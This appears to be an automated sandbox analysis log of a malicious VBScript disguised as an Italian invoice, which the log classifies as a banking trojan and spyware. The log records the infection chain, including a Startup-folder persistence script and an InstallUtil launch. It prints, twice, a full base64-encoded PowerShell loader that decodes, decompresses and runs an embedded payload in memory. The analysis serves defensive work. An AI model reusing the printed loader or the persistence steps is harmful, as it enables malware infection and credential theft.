Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F3810	9_2_067F3810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F98B8	9_2_067F98B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F4969	9_2_067F4969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F3920	9_2_067F3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F3919	9_2_067F3919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F79E0	9_2_067F79E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F79D0	9_2_067F79D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F7193	9_2_067F7193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F718A	9_2_067F718A
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_042DAA6C	15_2_042DAA6C
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_042DEA40	15_2_042DEA40
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_042DEDC8	15_2_042DEDC8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_042DAA6C	15_2_042DAA6C
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CA0040	15_2_09CA0040
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CA0024	15_2_09CA0024
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB0998	15_2_09CB0998
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB0994	15_2_09CB0994
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB5954	15_2_09CB5954
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB5960	15_2_09CB5960
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB5D2E	15_2_09CB5D2E
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CB0CB9	15_2_09CB0CB9
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE1D70	15_2_09CE1D70
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE2CA0	15_2_09CE2CA0
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CEF8A8	15_2_09CEF8A8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CEF8B8	15_2_09CEF8B8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_0A11E288	15_2_0A11E288
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_0A100007	15_2_0A100007
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_0A100040	15_2_0A100040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541C00	17_2_01541C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541978	17_2_01541978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541967	17_2_01541967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_015451D0	17_2_015451D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_015451C0	17_2_015451C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01544870	17_2_01544870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01543416	17_2_01543416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541C00	17_2_01541C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541FCA	17_2_01541FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541F94	17_2_01541F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_01541FA9	17_2_01541FA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0154426C	17_2_0154426C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05602B68	17_2_05602B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05602B48	17_2_05602B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0565D768	17_2_0565D768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0565098D	17_2_0565098D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05659010	17_2_05659010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0565CF60	17_2_0565CF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05659000	17_2_05659000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056A5D58	17_2_056A5D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056AB820	17_2_056AB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056AA7BF	17_2_056AA7BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056AB80F	17_2_056AB80F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056AD8C1	17_2_056AD8C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_056AD8D0	17_2_056AD8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_057CB108	17_2_057CB108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_057C7C70	17_2_057C7C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_057C8D08	17_2_057C8D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_057C7F97	17_2_057C7F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB74E0	17_2_05AB74E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABE1F2	17_2_05ABE1F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB9D28	17_2_05AB9D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABA940	17_2_05ABA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABD880	17_2_05ABD880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABFA00	17_2_05ABFA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB75F7	17_2_05AB75F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB7554	17_2_05AB7554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB74D0	17_2_05AB74D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB778F	17_2_05AB778F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB6668	17_2_05AB6668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB6658	17_2_05AB6658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABA070	17_2_05ABA070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABF9F1	17_2_05ABF9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05AB7833	17_2_05AB7833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_05ABD87F	17_2_05ABD87F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_060BC0C8	17_2_060BC0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_06221367	17_2_06221367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_06221378	17_2_06221378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_06227DE8	17_2_06227DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_06227DD7	17_2_06227DD7

Source: Fattura-24SC-99245969925904728562.vbs

Initial sample: Strings found which are bigger than 50

Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312120527.0000000000434000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004DC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005206000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOwvaenanf.exe" vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe.4.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2244
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2232
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2244	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2232	Jump to behavior

Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\c9d5959dd5627383
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000033F9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Fattura-24SC-99245969925904728562.vbs

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

File read: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
